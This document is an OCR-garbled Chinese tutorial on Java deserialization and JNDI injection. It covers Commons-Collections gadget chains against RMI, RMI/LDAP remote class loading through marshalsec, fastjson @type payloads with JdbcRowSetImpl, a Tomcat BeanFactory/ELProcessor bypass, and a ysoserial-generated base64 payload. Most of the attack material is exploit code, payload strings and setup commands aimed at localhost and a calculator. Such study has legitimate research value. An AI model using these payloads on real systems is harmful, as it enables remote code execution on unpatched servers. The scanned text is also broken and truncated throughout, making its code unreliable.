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M /a.rmi.Naming; 

[=] 

是 有 关 RMI .rmi.Remote; 

ij jva.rmi.RemoteException; 
o 





iva.rmi.registry.LocateRegistry; 


va.rmi.server.UnicastRemoteObject; 


Pinterface User extends Remote { 
plic String name(String name) throws RemoteException; 
blic void say(String say) throws RemoteException; 


ic void dowork(Object work) throws RemoteException; 


pStatic class UserImpl extends UnicastRemoteObject implements User{ 


tected UserImpl() throws RemoteException{ 


Super(); 


MiDlic String name(String name) throws RemoteException{ 


return name; 
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— : B 
|. public void say(String say) throws RemoteException{ 


System.out.println("you speak" + say); 


} 
public void k(Object work) throws RemoteException{ 
System.out.println("your work is " + work); 

} 

} 

public static void main(String[] args) throws Exception{ 
String url = "rmi://127.0,.0.1:1099/User"; 
UserImpl user - new UserImpl(); 
LocateRegistry.createRegistry( ^^); 
Naming.bind(url,user); 
System.out.println("the rmi is running ..."); 

} 


同时 服务 端 具有 以 下 特点 : 

。 jdk 版 本 1.7 

。 使 用 具有 漏洞 的 Commons-Collections3.1 组 件 

。 RMI 提 供 的 数据 有 Object 类 型 〈 因 为 攻击 payload 就 是 Object 类 型 ) 
客户 端 (攻击 者 ) 
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che.commons.collections 


.collections 

















apache.commons.collections 


pache.commons.collections 
J. apache . commons .collections 
lang.annotation.Target; 
lang.reflect.Constructor; 
.rmi.Naming; 

util.HashMap; 

Bruti. Map; 


«Server .User; 


S Client ( 


Static void main(Strin 


gf] 


Erg url = “rmi://127.0.0.1 


c 


~ System.out.println(userClient 


. UserClient.say("world"); 


“g 


. Transformer; 
.functors.ChainedTransformer; 
.functors.ConstantTransformer; 
. functors. InvokerTransformer; 


.map.TransformedMap; 


args) throws Exception{ 
:1999/User"; 


User userClient - (User)Naming.lookup(url); 


.name("lala")); 
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public static Object getpe yload() throws Exception{ 


| Transformer[] transformers = new Transformer[]{ 


WI 2 
I new ConstantTransformer(Runtime.class), 






"M 
WM new InvokerTransformer("getMethod", new Class[](String.class, c] 
II new InvokerTransformer(" invoke", new Class[](Object.class, Objec 


new InvokerTransformer(“exec", new Class[]{String.class}, new Ot 


F 





UNIN Transformer transformerChain = new ChainedTransformer (transformers); 








Map map = new HashMap(); 





map.put("value", "lala"); 





Map transformedMap = TransformedMap.decorate(map, null, transformerChair 


tation.AnnotationInvocation 





Class cl - Class.forName("sun.reflect.ar 








Constructor ctor - cl.getDeclaredConstructor(Class.class, Map.class); 


ctor.setAccessible(true); 





Object instance - ctor.newInstance(Target.class, transformedMap); 


return instance; 








亲 测 可 弹 计算 机 ， 完 成 任意 命令 执行 。 
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J.class, C] 


lass, Objec 


S}, Ot 
mers); 
yrmerChair 





其 实 把 RMI 服 务 器 当 作 一 个 readObject 复 写 点 去 利用 。 


lass); 参考 


e 
MIE 


https 
javase 2:8 14-04. RMITS (1) 


java 安 全 漫谈 -04.RMI 篇 (2) 
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JNDI 注 入 


前 言 


本 篇 讲述 了 RMI-JNDI 注 入 的 利用 原理 ， 分 析 了 利用 流程 ; 
使 用 了 marshalsec 反 序列 化 工具 去 简单 的 起 一 个 RMI/LDAP 服 务 端 


对 于 导致 JNDI 注 入 的 漏洞 代码 扩展 至 com.sun.rowset.JdbcRowSetlImpl 函 数 ， 为 fastjson 反 序列 
一 个 引子 ， 准备 新 起 一 文 。 


分 析 了 java 版 本 变化 对 于 JNDI 注 入 的 影响 
引出 了 1.8u191 之 后 的 版 本 该 如 何 利用 JNDI 注 入 ， 准 备 新 起 一 文 。 
提 到 了 LDAP-JNDI 注 入 






JNDI 


Java 命 名 和 目录 接口 (JNDI) 是 一 种 Java APl， 类 似 于 一 个 索引 中 心 ， 它 允许 客户 端 通过 name 发 
现 和 查找 数据 和 对 象 。 


其 应 用 场景 比如 : 动态 加 载 数据 库 配置 文件 ， 从 而 保持 数据 库 代 码 不 变动 等 。 
代码 格式 如 下 : 


String jndiName= ...; 
Context context = new InitialContext(); 


DataSource ds = (DataSourse)context.lookup(jndiName) ; 


这 些 对 象 可 以 存储 在 不 同 的 命名 或 目录 服务 中 ， 例 如 远程 方法 调用 (RMI) ， 通 用 对 象 请 求 代理 体 
系 结构 (CORBA) ， 轻 型 目录 访问 协议 (LDAP) 或 域名 服务 (DNS) 。 (此 篇 中 我 们 将 着 重 讲解 
RMI， 提 到 LDAP) 


RMI 格 式 : 
InitialContext vari = new InitialContext(); 
DataSource var2 = (DataSource)vari.lookup("rmi://127.0.0.1:1099/Exploit"); 


JNDIZEA 
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入 就 是 当 上 文 代码 中 jndiName 这 个 变量 可 控 时 ， 引发 的 漏洞 ， 它 将 导致 远程 class 文 
致远 程 代码 执行 。 


LEA; 






ax.naming.Context; 


ax.naming.InitialContext; 


Ss CLIENT { 


v 


过 name 发 
Static void main(String[] args) throws Exception { 


ping uri = "rmi://127.0.0.1:1099/aa"; 
intext ctx = new InitialContext(); 


x.lookup(uri); 


» 
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package jndi 注 入 ; 


import com.sun.jndi.rmi.registry.ReferenceWrapper; 
import javax.naming.Reference; 
import java.rmi.registry.Registry; 


import java.rmi.registry.LocateRegistry; 


public class { 














public static void t i | throws Exception { 


Registry registry = LocateRegistry.createRegistry(1099); 








Reference aa = new Reference("ExecTest", "ExecTest", "http://127.0, 





Referencewrapper refObjWrapper = new ReferenceWrapper(aa); 



































System.out.println("Binding 'refObjwrapper' to 'rmi://127.0.0.1:1099/aa] 





registry.bind( 33", refObjWrapper); 
































ExecTestjava( 攻 击 者 部 署 ) 
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P en à " » 7$ 
io.BufferedReader ; 


.IOException; 

.io.InputStream; 

! o.InputStreamReader; 

io. Reader ; 
x.print.attribute.standard.PrinterMessageFromOperator; 
ExecTest { 

IXecrest() throws IOException, InterruptedException{ 
ing cmd="whoami"; 

al Process process = Runtime.getRuntime().exec(cmd); 
INE fr ocess .getinputstream( ));; 
tMessage(process.getErrorStream()); 


value=process.waitFor(); 


Stem.out.println(value); 


1099/aa! 


e Static void printMessage(final InputStream input) { 
ny TODO Auto-generated method stub 

3 

“few Thread (new Runnable() { 


QOverride 


public void run() ( 





Reader reader =new InputStreamReader(input); 


BufferedReader bf - new BufferedReader(reader); 


175 





String line = null; 


". 


t 
( (Iinezbf.readLine())!zn: 
{ 
System.out.printin(line); 
} 
} (IOException e)f{ 


e.printStackTrace(); 


}).start(); 


编译 成 class 文 件 : javac ExecTest.java 
部 署 在 web 服 务 上 : py -3 -m http.server 8081 
运行 SERVER 


运行 CLIENT 
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Q = & — xploitjav java (à RegistryContext.class at hiicastRef class 
Harb 3 y 


MINGW64:/c/Users/lala/Desktop/test 
Ta laL APTOP, 
} $ py -3 -m http.server 8081 
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) 


D1 


Keyboard interrupt received, exiting. 
127.0.0.1 {18/oct/2019 13:55:11) T /ExecTest.class HTTP/1.1" 200 - 
[18/0ct/2019 13:55:11] “GET /ExecTest$1.class HTTP/1.1" 200 


-3 -m http.server 8081 
ing HTTP on 0.0.0.0 port 8081 tp://0.0.0.0:8081/) 


oard interrupt received 
7.0.0.1 [18/0ct/2019 1 : GET /ExecTest.class HTTP/1.1" 200 
0.0.1 - - [18/0ct GET /ExecTest$1.class HTTP/1.1 


http.server 8081 
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decodeObject:456, RegistryContext 
lookup:120, RegistryContext 

p:203, GenericURLContext 
lookup:411, InitialContext į 
main:13, CLIENT 





InitialContext.java 


getURLOrDefaultiInitCtx(name).lookup(name); 


GenericURLContext.java 


Reç 
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PEAKI: 
‘ResolveResult var2 = this.getRootURLContext(vari, this.myEnv); 


“Context var3 = (Context)var2.getResolvedObj(); 


| Object var4; 
a 


_ try í 


3 var4 = var3.lookup(var2.getRemainingName()); 


B) finally { 


var3.close(); 


RiConrext (St ! varl. Ha abi 2 Namingë 


Choose Implementation of GenericURLContext.getRootURLContext(String, Hashtable) (4 found) 
LopURLCor Li 


M ext fü 
URLContext u i Lin] 
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ee £ 
public Object 1 lame vari) throws NamingException { 
if (vari.isEmpty()) { 
return new RegistryContext(this); 
} eise { 
Remote var2; 
try { 
var2 = this.registry.lookup(vari.get( )); R 


} catch (NotBoundException var4) { 


throw new NameNotFoundException(vari.get(^)); 


} catch (RemoteException var5) { 


throw (NamingException)wrapRemoteException(var5).fillInStackTrace( 


return this.decodeObject(var2, vari.getPrefix(i));//$X0 DÀ ^ 
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pit 


® Variables debug info not available 


21:36ddd71 096574012169 





RegistryContext.java : 


ickTrace() 


L 








private Object d ) Remote vari, Name var2) throws Ni 


try { 






ZR 
Object var3 = vari instanceof RemoteReference ? ((RemoteReference)va 


return NamingManager.getObjectInstance(var3, var2, this, this.envirc 


) catch (NamingException vars) ( 
throw var5; 

) catch (RemoteException var6) ( 
throw (NamingException)wrapRemoteException(var6).fillInStackTrace(); 

) catch (Exception var?) { 
NamingException var4 - new NamingException(); 
var4.setRootCause(var7); 


throw var4; 


182 


Variables 
» 


@ Variables debug info not avail 


Jager. gett jostinstance var’. verd 


+* Bl Variables 
@ Variables debu: not available 
'ReferenceWrapper Stub[UnicastRef 由 veRef (endpoint: 


“aa” 








=3 
pun 


e 


mar wc Y 


//f& NReference 














public static Object 


























ctInstance(Object refinfo, Name name, Context nameCtx 





Hashtable<?, ?> environment) 











throws Exception 














































































































// Use reference if possible 










































































Reference ref = null; 



















































































if (refInfo instanceof Reference) {/ 





ref = (Reference) refInfo;/: 

















) else if (refinfo instanceof Referenceable) {// FHA 












































ref - ((Referenceable)(refInfo)).getReference(); 
































































































































Object answer; 

















































































































































































































































































































if (ref != null) {77 进 入 此 处 














String f = ref.getFactoryClassName();//Misi% ExecTesi 





















































af (T Iz nul) 








Atd 4 (ENEA  Sck4PE i X bed 





























factory - getObjectFactoryFromReference(ref, f); 




















































































































































































































if (factory != null) { 
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BES nyc we > ; " - 


etObjectInstance) , 





return factory.getObjectInstance(ref, name, nameCtx, 


environment); 


| answer = processURLAddrs(ref, name, nameCtx, environment); 
if (answer != null) { 


return answer; 
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Class clas = null; 


try t 
clas - helper.loadClass(factoryName); 


} catch (ClassNotFoundException e) { 


String codebase; 
if (clas == null && 


(codebase = ref.getFactoryClassLocation()) != null) { 


clas = helper.loadClass(factoryName, codebase); 


} catch (ClassNotFoundException e) { 
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E (clas != null) ? (ObjectFactory) clas.newInstance() : null; 


| 为 我 们 的 类 在 实例 化 后 不 能 转化 为 ObjectFactory (objectFactory) 
wInstance() 。 只 需要 我 们 的 类 继承 该 类 即 可 。 


ectFactory.java 的 getObjectinstance 接 口 复写 函 数 


egqetoDjectIinstance(Object obj, 


S Exception; 
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import 


import 


import 


import 


import 


public 


Vinc 
javax.naming.Context; 


javax.naming.Name; 
javax.naming.spi.ObjectFactory; 
java.io.IOException; 


java.util.Hashtable; 


class implements { 


QOverride 


public Object 


exec("xterm"); 


return null; 


public static String exec(String cmd) { 


try 4 


Runtime. getRuntime().exec(‘calc.exe"); 


} catch (IOException e) { 


e.printStackTrace(); 


recurs, Ms 


public static void n(String[] args) { 
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此 外 ， 
fr 版 本 E 


使 用 工具 起 rmi ldap 服 务 


以 忠 我 们 就 成 功 复 现 了 JNDI 注 入 ， 但 是 在 常规 使 用 中 我 们 自己 起 rmi 服 务 器 太 麻烦 了 。 





我 们 使 用 起 rmi、ldap 服 务 


下 载 后 ， 装 有 java8， 使 用 mvn clean package -DskipTests 编译 


Java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://i 


> 
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java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer htt 


除 此 之 外 恶意 class 文 件 的 web 服 务 还 需要 自己 去 起 。 


com.sun.rowset.JdbcRowSetlmpl 利用 链 


在 回 到 我 们 之 前 的 攻击 目标 服务 端 〈 也 就 是 rmi 服 务 客户 端 ) 
生前 我 们 利用 jndi 注 入 需要 满足 2 个 条 件 : 
一 是 : 我 们 需要 服务 端 存在 以 下 代码 ，uri 可 控 


String uri = "rmi://127.0.0.1:1099/aa"; 
Context ctx = new InitialContext(); 


ctx. lookup(uri); 


二 是 : 存在 漏洞 版 本 的 java 环 境 (目前 我 们 实验 了 1.8u211 是 不 可 以 的 ) 


我 们 先 来 扩展 第 一 个 代码 限制 的 问题 ， 就 有 点 像 在 commons-collection 反 序列 化 漏洞 中 寻找 
readobject 复 写 点 一 样 。 


总 是 有 很 多 机 缘 巧合 。 


com.sun.rowset.JdbcRowSetimpl#: 是 在 fastjson 反 序列 化 漏洞 中 触发 jndi 注 入 的 一 环 ， 此 处 
是 一 个 引子 ， 之 后 将 详细 分 析 fastjson 反 序列 化 的 原因 。 


JdbcRowSetImpl. java 
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"conn != null) { 


.conn.setAutoCommit(var1); 


.conn = this.connect(); 


s.conn.setAutoCommit(var1); 


setAutoCommit(boolean vari) throws SQLException f 
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T" 


-> 


Dm" ” 


protected Connection () throws SQLException { 
if (this.conn != null) { 
return this.conn; 


} else if (this.getDataSourceName() != null) { 


InitialContext vari = new InitialContext(); 






DataSource var2 = (DataSource)var1.lookup(this.getDataSourceNn 
return this.getUsername() != null && !this.getUsername().equal 
) catch (NamingException var3) { 


throw new SQLException(this.resBundle.handleGetObject( jspcro 


) eise { 


return this.getUrl() !- null ? DriverManager.getConnection(this.ge 


最 后 需要 this.getDataSourceName() 的 赋值 处 : 


JdbcRowSetImpl.java 
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ages "TA. y rco 
MeetDataSourceName(String vari) throws SQLException (//vari8]i? 


getDataSourceName() != null) { 


| (1this.getDataSourceName() .equals(vari)) { 






String var2 = this.getDataSourceName(); 
F super.setDataSourceName(var1); 
T this.conn = null; 


null; 


Athis. ps 


null; 


si 
ma 
p. 

wn 

x 

uo 

i 





.setDataSourceName(vari);.. - 


propertyChangeSupport.firePropertyChange(" dataSourceWame", (Object) 


C 如 下 ( 即 受 害 者 执行 以 下 代码 就 可 以 触发 漏洞 ) 
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package jndi 注 入 ; 


import com.sun.rowset.JdbcRowSetImpl; 


public las { 
public stat void thr i { 
JdbcRowSetImpl JdbcRowSetImpl_inc = new JdbcRowSetImpl(); 
JdbcRowSetImpl inc.setDataSourceName("rmi://127.0.0.1:1099/aa"); 


JdbcRowSetImpl_inc.setAutoCommit (true); 


用 工具 来 起 rmi 服 务 端 


java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec. jndi.RMIRefServer 
http://127.0.0.1:8090/#ExecTest 


然后 用 python 起 ExecTest.class 的 web (此 处 用 的 是 上 文 的 第 二 种 payload) 


py -3 -m http.server 8090 
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| 
Í 
t 










至 手 该 如 何 让 JdbcRowSetimpl_inc 执 行 在 受害 者 机 器 上 ， 那 就 是 反 序列 化 利用 链 一 样 地 衍生 了 ， 这 
适 避 是 衍生 出 第 一 步 说 明 ，JNDI 注 入 并 不 是 一 定 要 存在 一 个 web 服 务 对 外 ， 一 定 要 有 一 
4 ctx.lookup(uri) 的 Url 参数 可 控 ， 才 能 形成 漏洞 。 


漏洞 利用 要 考虑 java 环 境 、 组 件 ， 不 要 跟 SQL 注 入 一 样 认为 都 是 定 死 的 。 具 体 就 结合 fastjson 再 议 
To 


RMI+LDAP 注 入 java 版 本 限制 


我 们 再 回 到 第 二 个 版 本 限制 问题 : 


yDNI 注 入 由 于 其 加 载 动态 类 原理 是 JNDI Reference 远 程 加 载 Object Factory 类 的 特性 (使 用 的 不 是 
RMI Class Loading, 而 是 URLClassLoader) o 


所以 不 受 RMI 动 态 加 载 恶 意 类 的 java 版 本 应 低 于 7u21、6u45， 或 者 需要 设置 
javarmi.server.useCodebaseOnly=false 系 统 属性 的 限制 。 具 有 更 多 的 利用 空间 


入 是 我 们 之 前 实验 还 是 有 版 本 无 法 复 现 ， 是 因为 在 JDK 6u132, JDK 7u122, JDK 8u113 版 本 中 ， 系 

统 属性 com.sun.jndi.rmi.object.trustURLCodebase, 

ee jndi.cosnaming.object.trustURLCodebase 的 默认 值 变 为 false， 即 默认 不 允许 从 远程 
adebase 加 载 Reference 工 厂 类 。 (这 也 是 我 们 之 前 1.8u191 失 败 的 原因 ) 

全 和 也 提 到 jndi 注 入 远程 对 象 读 取 不 单单 只 可 以 从 rmi 服 务 中 读 取 ， 还 可 以 从 LDAP 服 务 中 读 取 

L a 

SRLPIBASISReference e nt Factory "RS&com.sun.jndi.rmi.object.trustURLCodebase, 
Sunindi.cosnaming.object.trustURLCodebase 等 属性 的 限制 ， 所 以 适用 范围 更 广 。 


Ry 
me 2018107, Java 最 终 也 修复 了 这 个 利用 点 ， 对 LDAP Reference 远 程 工厂 类 的 加 载 增加 了 


》 
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在 Oracle JDK 11.0.1、8u191、7u201、6u211 之 后 "e 
com.sun .jndi.ldap.object.trustURL Codebase 属性 的 默认 值 被 调整 为 false。 


7u201 
7u21 Gul se 8u191 
pue 7u122 odd 

8u113 0. 








javai rB 


RMI-JNDI 注 入 


至 于 1.8u191 之 后 咋 办 ， 我 们 新 起 一 篇 来 讲述 把 ; 还 是 先 来 看 一 下 LDAP+JNDI 注 入 的 利用 方式 


LDAP+JNDI 注 入 


LDAP 


LDAP (Lightweight Directory Access Protocol) - 轻 量 目录 访问 协议 。 但 看 了 这 个 解释 等 于 没 说 ， 
其 实 也 就 是 一 个 数据 库 ， 可 以 把 它 与 mysql 对 比 ! 


具有 以 下 特点 : 

1. 基于 TCP/IP 协 议 

2. 同样 也 是 分 成 服务 端 /客户 端 ， 同 样 也 是 服务 端 存 储 数 据 ， 客 户 端 与 服务 端 连接 进行 操作 

3. 相对 于 mysql 的 表 型 存储 ; 不同 的 是 LDAP 使 用 树 型 存储 

i. 因为 树 型 存储 ， 读 性 能 佳 ， 写 性 能 差 ， 没 有 事务 处 理 、 回 滚 功 能 。 

树 层次 分 为 以 下 几 层 : 

。 dn: 一 条 记录 的 详细 位 置 ， 由 以 下 几 种 属性 组 成 
dc: 一 条 记录 所 属 区 域 ( 哪 一 个 树 ， 相 当 于 MYSQL 的 数据 库 ) 
ou: 一 条 记录 所 处 的 分 又 ( 哪 一 个 分 支 ， 支 持 多 个 0u， 代 表 分 支 后 的 分 支 ) 
cn/uid: 一 条 记录 的 名 字 /ID 〈 树 的 叶 节点 的 编号 ， 想 到 与 MYSQL 的 表 主 键 ? ) 
举 个 例子 一 条 记录 就 是 


dn="uid=songtao.xu,ou=0a,dc=example,dc=com" 


POC 
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BOE 


法 是 没 差 的 ， 我 们 之 前 分 析 的 时 候 也 可 以 看 到 代码 会 根据 传 入 协议 头 的 区 别 去 进入 对 应 
只 需要 修改 传 入 参数 的 解析 头 ,再 启动 ldap 服 务 ， 恶 意 class 的 web 服 务 即 可 。 


本 问题 ， 我 们 在 1.8u161 版 本 (理论 上 是 RMI+JNDI 不 行 、LDAP+JNDI 可 以 的 版 本 ) 下 


ax.swing.*; 


HAR 
Mass CLIENT { 
于 没 说 Static void main(String[] args) throws Exception { 
j 
String uri = "1dap://127.0.0.1:1389/aa"; 
String uri = "rmi://127.0.0.1:1099/aa"; 
gk ntext ctx - new InitialContext(); 


lookup(uri); 


RELAX, RR, 
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CLIENT main() 


CLIENT 


CUENT = maint 





结果 没 毛 病 
+ 
小 结 
分 析 一 通 ， Ij 吉 就 是 INI E2357 i ldap- -JNDEE£A, 命中 率 更 高 。 


£d 


可 
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Man E 


sbuf.com/vuls/115849.html 


* +’ E - 
racode.com/blog/research/exploiting-jndi-injections-java 


e/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html 


shu.com/p/2accc2840a 


vc 


freebuf.com/column/ 





Wenblogs.com/wilburxu/p/9174353 


Wilanshu.com/p/7e4d99f6baaf 
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fastjson 漏 洞 浅 析 
前 


Dil 





根据 原理 不 同 ， 介 绍 了 三 个 版 本 类 型 的 漏洞 。 


fastjson 版 本 : 1.2.22-1.2.24 


这 些 版 本 的 fastison 未 对 @type 中 加 载 进 的 类 进行 过 滤 ， 导 致 的 这 一 版 漏洞 。 (后 面 有 具体 调试 ， 
基于 rmi+ 远 程 加 载 类 的 POC 为 例 ) 


以 下 针对 的 类 是 JdbcRowSetlmpl 类 和 特殊 类 Templatesimpl。 由 于 jdk 版 本 的 一 些 限制 ， 需 要 使 用 
种 姿势 绕 过 ， 但 是 关于 fastjson 的 基础 原理 都 是 一 样 的 。 


POC 有 以 下 几 种 : 
。 基于 rmi+ 远 程 加 载 类 
。 基于 ldap+ 远 程 加 载 类 
。 基于 rmi+BeanFactory 类 


。 基于 ldap+jndi 


。 基于 特殊 类 
POC 
基于 rmi+ 远 程 加 载 类 
payload 
{"@type": "com. sun, rowset .JdbcRowSetImpl", "dataSourceName":"rmi://localhost :109 


将 rmi 服 务 中 的 Exploit WEF https://127.0.0.1:8888/Exploit.class (远程 类 ) 
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体 调试 ， 
















fe i ^ oe 
jJ registry = LocateRegistry.createRegistry(i999); 


a 





Brererence = new Reference( "Exploit", "Exploit", "http://127.0.0.1:8888/' 


cewrapper referenceWrapper = new ReferenceWrapper (reference); 
a 
Y .bind( "Exploit", referenceWrapper) ; 


3 


.parse() ， 执 行 结果 如 下 


libaba.fastjson.JSON; 
jndi.rmi.registry.ReferenceWrapper; 


ing.NamingExcept ion; 
ing.Reference; 
AlreadyBoundExcept ion; 
.RemoteException; 
egistry.LocateRegistry; 
registry.Registry; 


ti 
void main(String[] args) throws AlreadyBoundException, RemoteException, NamingException { 
= LocateRegistry.createRegistry( po 1099); 





Í = new Reference( cassName: "Exploit", fact "Exg p://127,0.0,1:8888/"); 
IceWrapper referenceWrapper = new ReferenceWrapper (reference 


»bind( rame: "Exploit",referenceWrapper); 


ig testz" [V'ütypeN" :V'com sun. rowset. JdbcRowSetImplN"," + 
"A"dataSourceNameN" :N"rmi://localhost:1099/ExploitN", " + 
*"\"autoCommit\":true}"; 
setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "t 
se(test); 





, JDK 7u122, JDK 8u113 中 ，Java 限 制 了 Naming 服 务 中 JNDI Reference 远 程 加 载 
y 类 的 特性 。 


Idi.rmi.object.trustURLCodebase 、 com.sun.jndi.cosnaming.object.trustU 


”的 默认 值 变 为 false。 
本 是 1.8.0_221， 因 此 需 


tProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true"); o (RE 
Sun. jndi.rmi.object.trustURLCodebase 手动 设 为 true 是 不 现实 的 ， 因 此 该 方法 


LFS MNRAS 
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E > 
: et 4 hd 
("Gtype":"com.sun.rowset, JdbcRowSetImpl", "dataSourceName" :" 1dap://localhost;g 


将 ldap 服 务 中 的 Exploit 绑 定 于 https://127.0.0.1:8888/Exploit.class (7%) 
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alhost:3 


类 ) 


te static final String LDAP BASE = "dc=example, dc=com"; 


c static String classname; 





ie static void sta! amei,int porti) { 


InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerCc 
config.setListenerConfigs(new InMemoryListenerConfig( 

"listen", SNO! 

InetAddress.getByName(detetct.localip), //$NON-NIS-1$ 

port, 

ServerSocketFactory.getDefault(), 

SocketFactory.getDefault(), 

(SSLSocketFactory) SSLSocketFactory.getDefault())); 
config.addInMemoryOperationInterceptor(new OperationInterceptor(new 
InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); 
System.out.println("Listening on " + port); 


ds.startListening(); 
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} a * 
private static class tionInterceptor extends 

public URL codebase; 

public Operat ptor ( URI { 


this.codebase = cb; 


QOverride 

public void 
String base - result.getRequest().getBaseDN(); 
Entry e = new Entry(base); 
try { 


sendResult(result, base, e); 


catch ( Exception ei ) ( 


e1.printStackTrace(); 


protected void sc nMemoryIn 





e.addAttribute( ‘ia ', LdapServer.classname) ; 
e.addAttribute("javaCodeBase", this.codebase.toString()); 


e.addAttribute("objectClass", "javaNamingReference"); 


e.addAttribute("javaFactory", LdapServer .classname); 
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$ sa 
B result .sendSearchEntry(e); 


E result.setResult(new LDAPResult(^, ResultCode.SUCCESS)); 


naming.NamingE eption; 
naming.Ref 
Tmi.AlreadyBoundException; 
rmi.RemoteE epti 
mi.registry.i egistry; 
ava, rmi. registry. 


S test { 
atic void main(St 





ingll args) throws AireadyBoundException, RemoteException, NamingException { 
lerver.start( cessnamet: "Exploit", porti: 1389); 

g test="{\"Gtype\":\"com.sun. rowset. JdbcRowSetImplV," + 
*"\"dataSourceName\":\"ldap: //localhost:1389/Exploit\", " 
*N"autoConmitYV" : true)"; 

parse(test); 





加 载 类 原理 一 样 ， 只 不 过 使 用 了 ldap 服 务 替 代 rmi 服 务 ， 利 用 范围 更 广 一 些 。 


11.0.1, 8u191, 7u201. 6u211 之 后 
jndi.ldap.object.trustURLCodebase 属性 的 默认 值 被 调整 为 false， 取 消 了 ldap 远 程 
Factory 类 的 特性 。 


的 jdk 中 ， 需 


:SetProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true"); o 


n i+tBeanFactory 


版 本 jdk 对 rmi 服 务 禁用 了 远程 加 载 类 的 特性 ， 因 此 我 们 可 以 从 本 地 类 入 手 ， 比 如 BeanFactory 


ctory 类 特征 如 下 
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。 存在 于 tomcat 依 赖 包 中 p «+ 


。 存在 getObiectlnstance() 方 法 





* getObjectinstance() 方 法 加 载 其 他 类 并 实例 化 

。 getObjectlnstance() 方 法 可 将 加 载 类 中 的 setXXX 卫 数 强 制 转换 为 加 载 类 中 的 其 他 函数 并 调 
javax.el.ELProcessor 类 特征 

。 构造 函数 无 需 传 值 (RUER) 

。 类 中 含有 可 造成 代码 执行 的 函数 eval， 且 输入 类 型 为 String 


public Object { 


return getValue(expression, Object.class); 


Reference 工 厂 类 的 要 求 如 下 

。 存在 于 客户 端 ( 靶 机 ) 的 本 地 

。 至 少 存在 一 个 getObjectinstance() 方法 

。 实现 javax.naming.spi.ObjectFactory 接口 
BeanFactory 类 刚好 满足 Reference 工 厂 类 的 要 求 ， 且 可 实例 化 其 他 类 ， 因 此 可 利用 。 


payload 


String payload="{"@type":'java.lang.Class", “val”: ''com.sun. rowset . JdbcRowSet Imp 
String payload 2 = "{"@type': com.sun.rowset.JdbcRowSetImpl ," + 
""dataSourceName  : "rmi;. 
""autoCommit":true?'"; 
JSON.parse(payload); 


JSON.parse(payload 2); 
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^ oon E et —" 
registry = LocateRegistry.createRegistry(:055); 





ELProcessor, Lf 3&Jsorg.apache. naming.fact 
eeory 调 用 getobjectIinstance( ) 方 法 ， 并 使 得 加 载 类 为 Javax.6l .ELProcessor 


BRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "or 





Png 作为 eval 册 | 数 的 给 入 值 
ew StringRefAddr ("KINGX", evalString)); 
rapper referencewrapper = new ReferenceWrapper(ref); 


bind("Exploit", referenceWrapper); 


Factory.java 的 getObjectinstance() 方 法 中 提取 出 来 的 比较 关键 的 java 语 句 ， 结 合 
理解 。 
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beanClass = tcl.loadClass(beanClassName); 


Object bean = beanClass.getConstructor().newInstance(); 


RefAddr ra = ref.get("forceString"); 


if (index >= 9) ( 


setterName = param.substring(index + :/).trim(); 


param - param.substring(^, index).trim(); 


} 
try { 

forced.put(param, beanClass.getMethod(setterName, paramTypes)); 
b 
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opName = ra.getType(); 


“ing! test.testone.controller; 

ba. fast json. JSON; 
ndi.rmi.registry.ReferenceWrapper; 
»naming.ResourceRef; 
»NamingException; 
»StringRefAddr; 

ption; 

adyBoundExcept ion; 
istry.LocateRegistry; 
jistry.Registry; 


: void main(String{] args) throws IOException, NamingException, AlreadyBoundException { 
istry = LocateRegistry.createRegistry( : 8) 

Brerence, WERIN jav 21 .ELProcessor 

ref = new ResourceRef( «s 

+ “org.apache.naming. factory. 

Seval 


StringRefAddr( sdidrType: "forceString", ddr "KINGXseval 
hose 




















StringRefAddr( addrryse' "KINGX", addr "\"\". getClass (). 
(\"JavaScript\"} .eval(\"new java. lang. ProcessBuilder[* 
«ulator.app/'1).start0V")7)); 
apper referencewrapper = new ReferenceWrapper(ref); 
nd( nome: "Exploit", referencewrapper); 


icriptEngineManager\") .newInstance 
J/bin/sh','-c','open 













d="{\"@type\" :\"java.lang.Class\", \"val\":\"com. sun. 
laytoad 2 = "{\"atype\ om. sun. rowset. JdbcRowSetimpl\", 
d dataSourceHaneV" :\"rei: //127.0.0.1:1098/Exploit\"," + 
\ ‘autoCommit\":true}"; 

(payload); 

rselpayload_2); 








在 JDK 11.0.1. 8u191. 7u201. 6u211 之 后 有 效 。 该 利用 方式 只 能 利用 靶 机 本 地 的 类 ， 该 类 
于 tomcat 的 依赖 包 ， 因 此 前 提 是 靶 机 建立 在 tomcat 上 。jdk 较 高 版 本 禁用 rmi 远 程 加 载 类 ， 访 方法 
用 靶 机 含有 的 本 地 类 ， 因 此 可 适应 较 高 jdk 版 本 。 


基于 ldap+jndi 


高 版 本 jdk 对 Idap 服 务 远程 加 载 类 的 特性 作 了 限制 ， 但 是 除了 JNDI Reference，ldap 服 务 还 可 以 
入 的 javaSerializedData 数 据 进行 反 序列 化 。 


使 用 以 下 命令 生成 base64 编 码 的 恶意 序列 化 数据 







java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 'open /Applica 





hhdaj:por hhddjS j jai 21-8. 0. 6-5NAPSHOT-BETA-a11. jar ComsonsCollectionsé ‘open /Applications/Calculator.app' [baseoé 

TOGABXNyABE qYXZhLe' SdaeuSGE ca NL dL pENZVOL CARA e MBJDANANAT /QAAAARAAAXNyADRVC icu YXBhYZh ] LeNvDWI vbnMu' Y205bGV j J01 vbnMua 2Vbanl sdMUuVG1 12E1hcEVudHJSiqASRrnBH)sCAA AMANT ZX LAAB JMam 2Y abu 
AASMamF YS 106 Ls LOL eCOt ACHQAAZZVOINYACPYEMCUYABNY2NI LaNVLWI vbnMuY29 s HOV j dG LvbnMubWFwLko hen INYXBUSZSCnnkQ LAMAAUKAB2 Zh Y JAVEN LOACMb3 INL 2F«YWNoZ59 j621 16262 L2NvbOx YR pb25z L1 Ry YWE ZZM On$yly 
aGUuY29 toWüucy5 jb xs Na uC vat 
